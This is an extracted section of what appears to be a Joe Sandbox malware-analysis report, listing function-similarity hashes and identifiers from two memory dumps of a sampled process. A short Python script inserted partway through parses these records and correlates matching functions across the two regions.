                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &#
                                                                                                                                                                                                                                            • API String ID: 0-1789715784
                                                                                                                                                                                                                                            • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                            • Instruction ID: 96b86d7540c5f77ace728f7c69143a4dcb02229961cbb447936c71c566bc1532
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81A14C71A042105BDB1ADF28CC526BB73E5EF91324F09852EED96DB390E3B4D905C762
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                                                            • API String ID: 0-1505114982
                                                                                                                                                                                                                                            • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                            • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: de
                                                                                                                                                                                                                                            • API String ID: 0-2106599819
                                                                                                                                                                                                                                            • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                            • Instruction ID: 237539fc1c8f80e61523eba48e1ed7785010906efede98e614aae4835ec7f1bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53912271908311CAC324DF68C8E266BB7F2EFA1324F18992EE4D64B391E7788505C792
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
• Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1

Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction ID: 5bc335a9b2116e7bd9f3a38b2fdb064bd79dfa175364076baab1d7d3bead90e0
• Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction Fuzzy Hash: 5FA12976E042619FC725CE2CCC906ABB7E1AF95324F19823EECA9973D1D7318806C791

Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: RpB
• API String ID: 0-664042118
• Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
• Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
• Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
• Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A

Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: d1
• API String ID: 0-4211392460
• Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
• Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
• Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
• Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A

Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: c$
• API String ID: 0-2516980088
• Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
• Instruction ID: 34d734b052877dbdf523287f9c605fbc5785e0f76673639941e077e5292fae27
• Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
• Instruction Fuzzy Hash: E49199B0101741CFE7648F25C8A0B63BBB2FF56318F19958DC4864FBA1E379A846CB94

Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ihgf
• API String ID: 2994545307-2948842496
• Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
• Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
• Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
• Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46

Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ihgf
• API String ID: 0-2948842496
• Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
• Instruction ID: 6b8f5fe0cc72ad51f6b5591bbed2a957451959d292013d7bf185c2e6d6f1656a
• Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
• Instruction Fuzzy Hash: 3881B178A05201DFD754DF2CC880A6BB7E2EF99714F29953DE5858B3A1DB31E841CB42

Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
• Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
• Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
• Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
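The records in this section describe functions recovered from two memory regions of the same process: the image at offset 00400000 (based on PE: true) and the separately allocated region at offset 02490000 (based on PE: false). The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses records in this layout and correlates them across regions, listing Opcode IDs that appear in both (the same function body present in both regions) and API String IDs shared by records whose Opcode IDs differ (candidates worth diffing by hand). The embedded input is a condensed copy of four records from this section, with the last one truncated as it is on the page; the field names are the ones the report prints, and the interpretation of the matches is my own reading, not Joe Sandbox's documentation.

```python
import re
from collections import defaultdict

# Condensed copy of report records (some empty header lines omitted; the
# last record is cut off, as on the page, to exercise missing-field handling).
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
• Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction ID: 5bc335a9b2116e7bd9f3a38b2fdb064bd79dfa175364076baab1d7d3bead90e0
• Instruction Fuzzy Hash: 5FA12976E042619FC725CE2CCC906ABB7E1AF95324F19823EECA9973D1D7318806C791
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
• Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
• Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
"""

KEY_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
SRC_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


def parse_records(text):
    """One dict per 'Memory Dump Source' block. Lines without a bullet are
    section headers (Strings, Yara matches, Similarity, ...) and carry no value."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        m = KEY_RE.match(line)
        if cur is None or not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Associated":
            value = value.removesuffix("Download File")  # link text fused by extraction
        if key == "Source File":
            s = SRC_RE.search(value)
            cur["offset"] = int(s.group(1), 16)
            cur["based_on_pe"] = s.group(2) == "true"
            value = value.split(",")[0]  # keep only the .sdmp name
        cur[key] = value
    return records


def by_region(records, key):
    """Map each value of `key` to the set of region base offsets it occurs in."""
    idx = defaultdict(set)
    for r in records:
        if key in r:
            idx[r[key]].add(r["offset"])
    return idx


def identical_across_regions(records):
    """Opcode IDs present in more than one dump: same function body in both."""
    return sorted(k for k, v in by_region(records, "Opcode ID").items() if len(v) > 1)


def same_string_different_code(records):
    """API String IDs seen in several regions with differing Opcode IDs:
    the same string reference backed by different code, worth a manual diff."""
    out = []
    for sid, regions in by_region(records, "API String ID").items():
        if len(regions) < 2:
            continue
        ops = {r["Opcode ID"] for r in records if r.get("API String ID") == sid and "Opcode ID" in r}
        if len(ops) > 1:
            out.append((sid, sorted(ops)))
    return sorted(out)


def incomplete(records):
    """Records missing core fields, i.e. the section was cut off mid-record."""
    needed = ("Opcode ID", "Instruction ID", "Instruction Fuzzy Hash")
    return [r for r in records if any(k not in r for k in needed)]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("identical:", identical_across_regions(recs))
    print("same string, different code:", same_string_different_code(recs))
    print("truncated records:", [hex(r["offset"]) for r in incomplete(recs)])
```

To apply it to a whole report, feed `parse_records` the text of the function-similarity section as extracted; records from dumps other than the two shown here are handled the same way, since the region is taken from the `Offset:` field of each Source File line.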

Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                            • Instruction ID: 65632e723c189e4064236202250ffe9fae7105dc8b93c79f62f27da13805b71f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8771D432A083658BD7268E3CC48039EBBE2AFC5714F19892FE49497791D335DC46CB92
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: w
                                                                                                                                                                                                                                            • API String ID: 0-2991200456
                                                                                                                                                                                                                                            • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                            • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: w
                                                                                                                                                                                                                                            • API String ID: 0-2991200456
                                                                                                                                                                                                                                            • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                            • Instruction ID: df1b4b5bbd16396a99fa834d7ad3d71079d0bb8adfbdcfcaeee253d25b5b0675
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 624126BAE116258FD704DFA4CC845ABBB72FB84315B1AC1A8C8847B319D77869078BD0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ihgf
                                                                                                                                                                                                                                            • API String ID: 0-2948842496
                                                                                                                                                                                                                                            • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                            • Instruction ID: 119f3cb10ec40df81934660e4df2343e58433ea6d49c8757dafbc4cdbe146c8c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B31E638704300ABD7909F2E9C81B3BB7A5EB8672CF34453DE58593290D761E8518A56
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: ihgf
                                                                                                                                                                                                                                            • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                            • Opcode ID: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
                                                                                                                                                                                                                                            • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ihgf
                                                                                                                                                                                                                                            • API String ID: 0-2948842496
                                                                                                                                                                                                                                            • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                            • Instruction ID: 64227dee920a6a19049b1cc715272b82efc64a6e3f3c5d75cb337066e19d8a55
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD31E43CB04301EBE6919F289C81B3BF7A5EB8A718F34453DE68497390DB30E850CA56
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: dB
                                                                                                                                                                                                                                            • API String ID: 0-2104629891
                                                                                                                                                                                                                                            • Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                            • Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID:
• API String ID: 2994545307-0
• Opcode ID: cde97872139ee38f52f22e2c5030b2f1377ec2cf53a2e56726492b41f81a0a27
• Instruction ID: 525edced9e64931c4b5e0f3796b672fab6c33f46c8ad0116fde134fa66d2d6d1
• Opcode Fuzzy Hash: cde97872139ee38f52f22e2c5030b2f1377ec2cf53a2e56726492b41f81a0a27
• Instruction Fuzzy Hash: 40F102B56092009FE7089F24EC4076BB7E2FBDB301F55893EE5C587691DA798C42CB4A
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
• Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
• Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
• Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
• Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
• Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
• Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
• Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
• Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
• Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
• Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
• Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
• Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
• Instruction ID: 7df63c40a7204dc4afa58f15cbcbae2765b2c4f4d29a5674b1018b029ffe7601
• Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
• Instruction Fuzzy Hash: E4C1F2B16083808BD718DF25C850AAFBBE6EFD2314F14492DE4D68B391DB79C50ACB56
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
• Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
• Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
• Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
• Instruction ID: 1d31d0e3cb3652522f7c117d7c65fa6ab86b4b3685883d61f1be044566124514
